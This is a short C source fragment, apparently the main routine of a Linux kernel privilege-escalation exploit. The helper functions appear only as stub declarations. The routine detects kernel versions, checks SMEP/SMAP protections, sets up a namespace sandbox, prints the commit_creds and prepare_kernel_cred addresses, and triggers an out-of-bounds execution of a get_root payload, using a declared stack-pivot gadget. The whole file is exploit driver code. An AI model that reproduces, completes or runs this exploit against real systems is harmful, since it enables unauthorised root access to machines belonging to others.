
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int COMMIT_CREDS ;
 int KERNEL_BASE ;
 int PREPARE_KERNEL_CRED ;
 unsigned long XCHG_EAX_ESP_RET ;
 int check_root () ;
 int check_smep_smap () ;
 int detect_versions () ;
 int get_kernel_addr () ;
 int get_root ;
 int mmap_stack () ;
 int oob_execute (unsigned long) ;
 int printf (char*,...) ;
 int setup_sandbox () ;

int main(int argc, char** argv) {
 printf("[.] starting\n");

 printf("[.] checking distro and kernel versions\n");
 detect_versions();
 printf("[~] done, versions looks good\n");

 printf("[.] checking SMEP and SMAP\n");
 check_smep_smap();
 printf("[~] done, looks good\n");

 printf("[.] setting up namespace sandbox\n");
 setup_sandbox();
 printf("[~] done, namespace sandbox set up\n");







 printf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
 printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);

 unsigned long payload = (unsigned long)&get_root;
 printf("[.] executing payload %lx\n", payload);
 oob_execute(payload);
 printf("[~] done, should be root now\n");

 check_root();

 return 0;
}
